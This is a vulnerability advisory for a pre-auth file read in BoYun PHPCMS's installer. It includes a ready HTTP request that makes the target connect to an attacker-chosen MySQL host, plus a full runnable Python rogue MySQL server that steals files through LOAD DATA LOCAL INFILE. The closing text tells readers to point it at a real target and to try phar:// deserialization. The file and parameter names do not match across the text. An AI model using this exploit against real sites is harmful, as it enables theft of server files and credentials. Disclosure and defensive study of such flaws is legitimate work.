BoYun PHPCMS in file public/install.php has a Pre-Auth Arbitrary File Download vulnerability


Bug Author:

YELEIPENG


Affected version:

≤ 1.21


Vendor:

https://www.boyunweb.cn/


Software:

https://www.boyunweb.cn/pc/index57/index/classid/26/id/42.html


Vulnerability File:

  • install/install2.php


Description:

1. In install/install2.php, the step parameter can be set to get_dblist, which makes the installer open a MySQL connection to whatever host the request specifies. No authentication is required, and the installer is still reachable.


2. Because the application connects to a MySQL server we control, we can abuse LOAD DATA LOCAL INFILE: in the MySQL client protocol, the server answers a query by asking the client to send a file, and the client reads that file from its own filesystem and sends the contents back. With PHP ≤ 7.1 the mysqli/mysqlnd client honours such requests by default (later PHP releases default mysqli.allow_local_infile to Off, so there the setting must have been enabled explicitly), so a rogue server can pull any file the web server process can read.

We can set up a rogue MySQL server on our side, for example:

https://github.com/jib1337/Rogue-MySQL-Server


3. Now send a request to the installer so that it connects to our rogue server (db_host below is the attacker-controlled host; the credentials are ignored by the rogue server):

POST /install/install2.php HTTP/1.1
Host: byphpcms1.lab.wetolink.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 69

db_create=1&db_host=192.168.3.250&db_id=1&db_pass=123456&db_name=test


Now the target connects to the rogue server, which requests the file, and we receive its contents.


Since the mysqlnd client opens the requested path through PHP's stream layer, the rogue server may also request a phar:// path to trigger unserialization of Phar metadata :)
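As an added illustration, not code from the original report, from the Rogue-MySQL-Server project or from BoYun, the script below shows the protocol exchange behind steps 2 and 3: a minimal rogue MySQL server that greets the client with CLIENT_LOCAL_FILES enabled, accepts any credentials, and answers the client's first query with a LOCAL INFILE request for a file of the attacker's choosing. To keep it runnable offline, a stand-in client that behaves like mysqli with allow_local_infile on connects to it on a loopback port and serves a constructed in-memory file table instead of the real filesystem; against a real target the victim's PHP installer is the client and the file comes from its disk. The port, file names and file contents are assumptions for the demonstration.

```python
"""Minimal rogue MySQL server demonstrating the LOAD DATA LOCAL INFILE file read.

Added example for the BoYun PHPCMS write-up; not the project's or the report's code.
All file names and file contents below are constructed for the demonstration.
"""
import socket
import struct
import threading

# Capability flags (subset) from the MySQL client/server protocol.
CLIENT_LONG_PASSWORD = 0x00000001
CLIENT_LOCAL_FILES = 0x00000080      # server may ask the client to upload a local file
CLIENT_PROTOCOL_41 = 0x00000200
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000
CAPABILITIES = (CLIENT_LONG_PASSWORD | CLIENT_LOCAL_FILES | CLIENT_PROTOCOL_41
                | CLIENT_SECURE_CONNECTION | CLIENT_PLUGIN_AUTH)  # deliberately no CLIENT_SSL

OK_PAYLOAD = b"\x00\x00\x00\x02\x00\x00\x00"  # OK header, 0 rows, 0 insert id, autocommit, 0 warnings
LOCAL_INFILE_MARKER = 0xFB                   # response header meaning "send me this file"

# Constructed stand-in for the victim's filesystem (only used by the fake client).
FAKE_FILES = {b"/etc/passwd": b"root:x:0:0:root:/root:/bin/bash\n"}


def mysql_packet(payload: bytes, seq: int) -> bytes:
    """Wrap a payload in a MySQL wire packet: 3-byte little-endian length + 1-byte sequence id."""
    return struct.pack("<I", len(payload))[:3] + bytes([seq & 0xFF]) + payload


def recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("peer closed connection")
        buf += chunk
    return buf


def read_packet(sock: socket.socket) -> tuple[int, bytes]:
    """Read one packet; return (sequence id, payload)."""
    header = recv_exact(sock, 4)
    return header[3], recv_exact(sock, int.from_bytes(header[:3], "little"))


def greeting_payload() -> bytes:
    """Initial Handshake (protocol version 10) advertising CLIENT_LOCAL_FILES."""
    return (b"\x0a" + b"5.7.0-rogue\x00" + struct.pack("<I", 1)
            + b"A" * 8 + b"\x00"                          # auth-plugin-data part 1, filler
            + struct.pack("<H", CAPABILITIES & 0xFFFF) + b"\x21"   # capabilities (low), utf8 charset
            + struct.pack("<H", 0x0002) + struct.pack("<H", CAPABILITIES >> 16)  # status, caps (high)
            + b"\x15" + b"\x00" * 10                       # auth-plugin-data length, reserved
            + b"B" * 12 + b"\x00" + b"mysql_native_password\x00")


def handle_client(conn: socket.socket, filename: bytes) -> bytes:
    """Run the rogue exchange on one accepted connection; return the bytes the client uploaded."""
    conn.sendall(mysql_packet(greeting_payload(), 0))
    seq, _handshake_response = read_packet(conn)          # any credentials are accepted
    conn.sendall(mysql_packet(OK_PAYLOAD, seq + 1))
    seq, _query = read_packet(conn)                       # client's first COM_QUERY (e.g. SHOW DATABASES)
    conn.sendall(mysql_packet(bytes([LOCAL_INFILE_MARKER]) + filename, seq + 1))
    data = b""
    while True:                                           # file arrives in chunks; empty packet ends it
        seq, chunk = read_packet(conn)
        if not chunk:
            break
        data += chunk
    conn.sendall(mysql_packet(OK_PAYLOAD, seq + 1))
    return data


def fake_client(port: int, files: dict) -> bytes:
    """Stand-in for the victim's mysqli client with allow_local_infile on: it hands over whatever
    file the server asks for. Returns the file name the server requested."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        seq, greeting = read_packet(s)
        assert greeting[0] == 0x0A, "unexpected protocol version"
        s.sendall(mysql_packet(b"\x00" * 32 + b"root\x00", seq + 1))  # minimal HandshakeResponse41
        read_packet(s)                                                   # OK from server
        s.sendall(mysql_packet(b"\x03SHOW DATABASES", 0))               # COM_QUERY
        seq, resp = read_packet(s)
        if resp[0] != LOCAL_INFILE_MARKER:
            return b""
        requested = resp[1:]
        s.sendall(mysql_packet(files.get(requested, b""), seq + 1))     # file contents
        s.sendall(mysql_packet(b"", seq + 2))                            # empty packet = end of file
        read_packet(s)                                                   # final OK
        return requested


def demo(filename: bytes = b"/etc/passwd") -> tuple[bytes, bytes]:
    """Run rogue server and fake client on a loopback port; return (requested name, received bytes)."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    result = {}

    def serve() -> None:
        conn, _ = srv.accept()
        with conn:
            result["data"] = handle_client(conn, filename)

    t = threading.Thread(target=serve)
    t.start()
    requested = fake_client(srv.getsockname()[1], FAKE_FILES)
    t.join()
    srv.close()
    return requested, result["data"]


if __name__ == "__main__":
    name, content = demo()
    print(f"rogue server asked for {name!r} and received {content!r}")
```

The server never validates the handshake response, which is why the db_pass value in the request above is irrelevant: the victim's client accepts whatever the server says and, on the first query, is told to upload the file. Replace the fake client with a real target by pointing db_host at the machine running handle_client, and replace the file name with the path you want read (or a phar:// path, as the report notes).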